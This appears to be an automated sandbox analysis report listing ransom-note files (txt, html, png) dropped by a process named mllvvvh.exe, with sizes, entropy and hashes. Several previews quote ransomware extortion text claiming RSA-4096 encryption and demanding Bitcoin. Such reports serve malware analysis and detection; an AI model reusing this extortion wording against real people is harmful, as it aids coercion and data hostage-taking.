                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
